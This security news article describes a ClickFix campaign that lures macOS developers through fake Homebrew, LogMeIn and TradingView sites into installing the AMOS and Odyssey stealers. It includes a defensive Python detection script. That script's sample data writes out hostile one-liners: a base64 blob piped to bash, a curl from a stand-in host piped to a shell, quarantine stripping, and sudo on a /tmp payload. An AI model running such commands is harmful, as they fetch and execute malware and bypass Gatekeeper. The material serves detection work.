A new malicious campaign is actively targeting macOS developers with fake websites that impersonate popular platforms such as Homebrew, LogMeIn, and TradingView. The campaign relies on a social-engineering technique known as "ClickFix" to trick users into running Terminal commands that install information-stealing malware such as AMOS (Atomic macOS Stealer) and Odyssey.
The ClickFix Infection
Researchers at Hunt.io identified over 85 domains impersonating the three legitimate platforms. In some cases, the threat actor used Google Ads to promote these malicious sites, ensuring they appeared prominently in search results for unsuspecting users.
The malicious sites feature convincing download portals and instruct users to copy a curl command into their Terminal to "install" the fake app. For platforms like TradingView, the command is disguised as a "connection security confirmation step." When the user clicks the copy button, however, the clipboard receives a base64-encoded installation command rather than the simple ID the page appears to offer.
This command fetches and executes an install.sh script, which in turn downloads the final binary payload. Crucially, the script removes the quarantine flag so that Gatekeeper never prompts, allowing the malware to run without user approval.
Malware Execution and Evasion
The payload, either AMOS or Odyssey, first checks that it is not running inside a virtual machine or analysis system. To gain complete control, the malware explicitly invokes sudo to run commands as root.
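The chain described in the ClickFix section (a copied curl one-liner, a base64-encoded command, an install.sh that strips the quarantine flag) and the sudo escalation above all leave recognisable traces in shell history and process-execution telemetry. The following Python script is an added example, not code from the Hunt.io report or this article: it scans a constructed set of command lines for those indicators and decodes embedded base64 blobs so a one-liner is judged on what it would actually run. Every sample line, the example.invalid domain and the file paths are made up for illustration, and the patterns are a starting point for a detection rule rather than a complete signature.

```python
"""Flag ClickFix-style command lines in shell history or process telemetry.

Added example for this article, not code from the Hunt.io report. Sample
input, domains and paths below are constructed for illustration.
"""
from __future__ import annotations

import base64
import binascii
import re
from typing import Optional

# A fetch tool whose output is piped straight into a shell.
FETCHER = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
# "base64 -D" (macOS) or "base64 -d/--decode" feeding a shell.
BASE64_DECODE = re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b")
# xattr removing the com.apple.quarantine attribute (or clearing all attributes).
QUARANTINE_STRIP = re.compile(
    r"\bxattr\b[^|;&]*?(?:-d\s+com\.apple\.quarantine|\s-(?:r?c|cr)\b)"
)
# sudo run on something living in a temporary or download location.
SUDO_TEMP_PATH = re.compile(
    r"^\s*sudo\s.*(?:(?:/private)?/tmp/|/var/folders/|/Downloads/)"
)
# A standalone run of base64 alphabet long enough to hide a command.
BASE64_BLOB = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/=]{20,}(?![A-Za-z0-9+/=])")


def try_decode_base64(blob: str) -> Optional[str]:
    """Return the decoded text if blob is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\n\t" for ch in text):
        return None
    return text


def analyze_command(cmd: str, depth: int = 0) -> list[str]:
    """Return the indicators found in one command line.

    Embedded base64 blobs are decoded and rescanned (two levels deep), so
    `echo <blob> | base64 -D | bash` is judged on what it would actually run.
    """
    findings: list[str] = []
    if FETCHER.search(cmd) and PIPE_TO_SHELL.search(cmd):
        findings.append("fetch-piped-to-shell")
    if BASE64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        findings.append("base64-decode-piped-to-shell")
    if QUARANTINE_STRIP.search(cmd):
        findings.append("quarantine-attribute-removed")
    if SUDO_TEMP_PATH.search(cmd):
        findings.append("sudo-on-temp-path")
    if depth < 2:
        for blob in BASE64_BLOB.findall(cmd):
            decoded = try_decode_base64(blob)
            if decoded is not None:
                findings.extend(
                    "decoded:" + f for f in analyze_command(decoded, depth + 1)
                )
    return findings


def scan_log(lines) -> list[tuple[int, str, list[str]]]:
    """Return (line_number, command, findings) for every line that raised an indicator."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = analyze_command(line)
        if findings:
            hits.append((number, line, findings))
    return hits


# Constructed sample, shaped like a zsh history or EDR process-command export.
# example.invalid is a reserved name; nothing here comes from the real campaign.
_ENCODED = base64.b64encode(
    b"curl -fsSL http://example.invalid/install.sh | bash"
).decode()
SAMPLE_COMMAND_LINES = [
    "brew install wget",                                   # benign: real Homebrew
    f"echo '{_ENCODED}' | base64 -D | bash",                # ClickFix clipboard one-liner
    "curl -fsSL http://example.invalid/install.sh | sh",   # what the blob decodes to
    "xattr -d com.apple.quarantine /tmp/Installer.app",    # install.sh stripping Gatekeeper's flag
    "sudo /tmp/.payload --run",                            # payload escalating to root
    "git status",                                          # benign
    "xattr -l ~/Downloads/file.dmg",                       # benign: only listing attributes
]

if __name__ == "__main__":
    for number, line, findings in scan_log(SAMPLE_COMMAND_LINES):
        print(f"line {number}: {', '.join(findings)}\n    {line}")
```

Running the script prints the four suspicious lines with their indicators; the two benign xattr and brew lines are left alone because the rules key on the specific flag that strips quarantine and on a fetch or decode that is piped into a shell, not on the tool names by themselves. Feeding real history (`~/.zsh_history`) or an EDR process export through `scan_log` is the intended use; the decode step is what catches the clipboard variant, where the visible command shows nothing but a base64 string.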
Once launched, the malware collects detailed hardware and memory information and starts manipulating system services, such as killing the OneDrive updater daemons. It also interacts with macOS XPC services to blend its malicious activity with legitimate processes.
The information-stealing components then activate, harvesting sensitive data from browsers, cryptocurrency credentials, and other personal files before exfiltrating it to the command-and-control (C2) server. AMOS and Odyssey are capable, modern stealers built to harvest a broad range of data. Users are strongly urged never to paste commands into their Terminal from online sources unless they fully understand what the command does and trust the source completely.